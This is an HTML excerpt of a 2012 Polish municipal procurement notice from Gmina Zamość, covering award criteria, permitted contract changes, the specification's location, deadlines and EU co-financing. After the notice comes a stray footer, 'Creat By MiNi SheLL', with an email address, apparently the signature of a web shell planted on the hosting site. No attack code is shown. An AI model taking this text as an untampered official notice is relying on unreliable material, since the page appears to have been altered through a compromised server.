<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Ogólne warunki umowy na jakich Zamawiający zamierza zawrzeć umowę z wybranym Wykonawcą zawarte są w projekcje umowy stanowiącym załącznik do niniejszej siwz.
Zamawiający przewiduje wprowadzenie zmian w zawartej umowie w przypadku:

zmiany w projekcie;
zmiany warunków finansowania
zmiany terminów zakończenia całości lub elementu zamówienia</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.mbnet.zamosc.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Zamość, ul. Peowiaków 92,22-400, pokój nr 23.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.08.2012 godzina 10:00, miejsce: Biuro  Obsługi Interesanta, stanowisko nr.1, w terminie do dnia 13.08.2012 r do godziny 10:00  czasu lokalnego.
Otwarcie 13.08.2012 r godzina 10:15..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Program Operacyjny  Rozwój Polski Wschodniej na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com